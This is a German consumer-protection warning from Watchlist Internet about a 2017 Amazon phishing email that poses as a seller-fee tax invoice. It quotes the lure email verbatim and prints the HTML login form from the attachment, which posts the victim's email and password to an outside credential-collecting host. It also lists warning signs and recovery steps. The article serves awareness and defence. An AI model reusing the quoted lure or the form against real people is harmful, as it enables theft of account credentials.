Zum Seiteninhalt

News

Amazon-Phishingmail: Rechnung über Ihre Verkäufergebühren

Gepostet am 27.03.2017 um 15:20 Uhr von Watchlist Internet

In einer angeblichen Nachricht von „Europe Amazon“ erhalten Kund/innen die Information, dass ihr „Duplikat der elektronisch erzeugten Steuerrechnung“ verfügbar sei. Sie können es in einem beigefügten Dokument, das den Login-Bereich von Amazon imitiert, herunterladen. Es handelt sich um einen Phishingversuch.

Mit einer gefälschten Amazon-Nachricht versuchen Kriminelle, die Zugangsdaten von Kund/innen zu stehlen. Damit sie das Ziel erreichen, behaupten sie, dass die „elektronisch erzeugten (sic!) Steuerrechnung“ als „Email-Dokument (sic!)“ verfügbar sei. Die Steuerrechnung könne angeblich nur durch Bekanntgabe der Zugangsdaten in einem beigefügten html-Dokument eingesehen werden. Wortwörtlich heißt es in der E-Mail dazu:

Absender: Europe Amazon <messages-marketplace@amazon-europe.com>
Betreff: Rechnung uber Ihre Verkaeufergebuehren bei Amazon.de 03/2017 .

Guten Tag,

Wir werden Ihnen ein Duplikat der elektronisch erzeugten Steuerrechnung für den Monat 02/2017 als ein Email-Dokument senden. Bemerken Sie(nehmen Sie zur Kenntnis) bitte, dass das nicht ein Zahlungsantrag(Zahlungswunsch) ist.

Loggen Sie bitte in zu Ihrem Verkaufskonto in Verkäufer Zentral, Sie werden die Form(Formular) für Ihr Konto per Email geschickt oder um Kopien anderer Steuererklärungen zu bitten, bezahlt zu werden.

Wenn Sie weitere Fragen haben, setzen Sie sich bitte mit unserem Verkaufsdienst in Verbindung.

Blicke(Hinsicht)

Freundliche Grusse
Amazon Europe

Dateianhang: Rechnung-mustermailadresse #25.03.2017.html

Bereits grafisch erweckt die gefälschte Amazon-Phishingmail den Eindruck, unseriös zu sein:


Eine gefälschte Amazon-Phishingmail.

Datenübermittlung an Kriminelle

Empfänger/innen, die den Dateianhang der E-Mail öffnen, um ihre angebliche Steuerrechnung zu sehen, sehen ein html-Dokument, das den Loginbereich von Amazon imitiert Ihre E-Mailadresse ist bereits in einem von zwei Formularfeld eingetragen. Kund/innen müssen nur noch ihr Passwort eingeben und die Schaltfläche „Anmelden“ betätigen.


Eine gefälschte Amazon-Phishingmail.

Das Betätigen der Schaltfläche „Anmelden“ führt den Befehl

<form action="verify.amazon-check.us/verify.php" method="post"><br>
<input id="user" name="user" type="text" value="muster@adresse.at"  required/>
<input id="pass" name="pass" type="password" value=""  required/><br />
<input id="submit" name="submit" type="submit" value="" />

aus. Der Befehl führt dazu, dass Kund/innen die im Formular abgefragten Informationen an Kriminelle senden. Dadurch haben diese Zugang auf das fremde Amazon-Konto und können es für Verbrechen nutzen.

Woran erkennen Sie die Phishingmail?

Die vermeintliche Amazon-Nachricht können Sie unter anderem anhand der nachfolgenden Punkte als betrügerisch erkennen:

  • Amazon versendet kein „Duplikat der elektronisch erzeugten Steuerrechnung“. Damit ist die Nachricht inhaltlich falsch.
  • Als Absender der E-Mail scheint „Europe Amazon“ auf, die dazugehörige E-Mailadresse „messages-marketplace@amazon-europe.com“ gehört jedoch nicht dem Unternehmen: Ein Anonymisierungsdienst aus den USA hat die Domain „amazon-europe.com“ registriert.
  • Die E-Mail weist zahlreiche Fehler auf („Bemerken Sie (nehmen Sie zur Kenntnis) bitte“). Echte Amazon-Nachrichten sind lektoriert und fehlerfrei.
  • Das Schreiben spricht Empfänger/innen nicht persönlich an: „Guten Tag“. Unternehmen kennen ihre Kund/innen und benennen diese mit ihrem Namen.
  • Kund/innen sollen in einem manipulierten Dateianhang ihre Amazon-Zugangsdaten bekannt geben und diese an Unbekannte senden. Das ist ein eindeutiger Hinweis darauf, dass es sich um einen Phishingversuch handelt.

Sie haben das Formular ausgefüllt?

Wenn Sie das Formular der Kriminellen ausgefühlt haben, rufen Sie umgehend die offizielle Amazon-Website auf und ändern darauf das Passwort Ihres Benutzerkontos. Ist das nicht mehr möglich, weil sich die Verbrecher/innen bereits Zugriff zu Ihrem Konto verschafft haben, kontaktieren Sie den Amazon-Kundendienst und besprechen mit ihm das weitere Vorgehen zur Schadensabwehr. Rufen Sie Ihr Kreditkarteninstitut an und lassen Sie  Ihre Kreditkarte sperren. Finden Sie auf Ihren Kontoauszügen nicht von Ihnen autorisierte Abbuchungen, beeinspruchen Sie diese bei Ihrer Bank.

Die Watchlist Internet empfiehlt:

Verschieben Sie vermeintliche Amazon-Nachrichten, die Sie auffordern, persönliche Zugangsdaten in einem Dateianhang bekannt zu geben, in Ihren Spam-Ordner. Bei den E-Mails handelt es sich um einen Phishingversuch. Er zielt darauf ab, das Fremde Zugriff auf Ihr Kundenkonto erlangen!

(Die Watchlist Internet bedankt sich bei Leser/innen für die Meldung der Amazomn-Phishingnachricht.)

Alles zum Thema „Phishing

Gefälschte Apple-Mail: Deine Apple-ID wurde aktualisiert

In einer gefälschten Apple-Nachricht behaupten Kriminelle, dass das Passwort von Kund/innen geändert worden sei. Aus diesem Grund sollen sie auf einer Website persönliche Informationen bekannt geben und damit die ungewollte Änderung rückgängig machen. In Wahrheit führt die Bekanntgabe der Daten dazu, dass Verbrecher/innen über diese verfügen.

weiterlesen

Gepostet am 24.04.2017 um 15:41 Uhr von Watchlist Internet

Phishingversuch bei der FH Oberösterreich

In einer gefälschten FH OÖE IT-SERVICE DESK-Nachricht heißt es, dass Empfänger/innen ihr Webmail-Konto bestätigen müssen. Dazu sollen sie eine Website aufrufen und ihre Zugangsdaten bekannt geben. Es handelt sich um einen Phishingversuch. Wer der Aufforderung nachkommt, übermittelt Kriminellen die Zugangsdaten des FH OÖ-Webmailkontos.

weiterlesen

Gepostet am 22.03.2017 um 12:35 Uhr von Watchlist Internet

Gefälschte Oberbank-Nachricht: Konto gesperrt!

Kund/innen erhalten scheinbar eine E-Mail der Oberbank. Darin heißt es, dass es zu einem nicht autorisierten Zugriff auf ihr Konto gekommen sei. Aus diesem Grund sollen Empfänger/innen ihre Zugangsdaten auf einer gefälschten Oberbank-Website bekannt geben. Es handelt sich um einen Phishingversuch!

weiterlesen

Gepostet am 27.02.2017 um 13:14 Uhr von Watchlist Internet

Kriminelle versenden gefälschte BAWAK P.S.K.-SMS

In einer gefälschten BAWAG P.S.K.-SMS heißt es, dass die Bank das Konto von Kund/innen gesperrt habe. Damit diese ihr Konto wieder aktivieren können, sollen sie eine Website aufurfen und ihre Zugangsdaten bekannt geben. Achtung: Es handelt sich um einen Phishingversuch. Am besten ist es, wenn Sie die SMS löschen.

weiterlesen

Gepostet am 24.02.2017 um 15:33 Uhr von Watchlist Internet

Gefälschte iTunes-Rechnung: Danke für Ihren Einkauf

Mit einer gefälschten iTunes-Rechnung wollen Kriminelle Empfänger/innen dazu bewegen, dass sie eine Website aufrufen. Auf dieser sollen Besucher/innen Kreditkarteninformationen bekannt geben, damit sie einen nicht gewollten Einkauf stornieren können. Es handelt sich um einen Datendiebstahlsversuch. Sie dürfen die Daten nicht bekannt geben.

weiterlesen

Gepostet am 09.02.2017 um 09:15 Uhr von Watchlist Internet

Gefälschte A1-Phishingmail: Neue Messaging-Plattform

Kriminelle versenden eine gefälschte A1 Online-Nachricht. Sie hat das Betreff „Maßnahme erforderlich: Neue Messaging-Plattform“ und fordert von Empfänger/innen, dass sie ihre Zugangsdaten auf einer Website bekannt geben. Das sei angeblich erforderlich, weil es eine neue Webmail Benutzeroberfläche gäbe. Es handelt sich um einen Phishingversuch!

weiterlesen

Gepostet am 26.01.2017 um 14:38 Uhr von Watchlist Internet

Personalisierte card complete-Phishingmail

Eine personalisierte cardcomplete-Phishingmail, die Empfänger/innen direkt beim Namen benennt, ist im Umlauf. In dieser behaupten Kriminelle, dass es zu verdächtigen Transaktionen gekommen sei, weshalb Kund/innen sich auf einer Website legitimieren sollen. Es handelt sich um einen Versuch, mit dem Kriminelle an fremde Kreditkartendaten gelangen wollen.

weiterlesen

Gepostet am 12.01.2017 um 14:35 Uhr von Watchlist Internet

Unterstützt von:

Ein Projekt des:

Internet Ombudsmann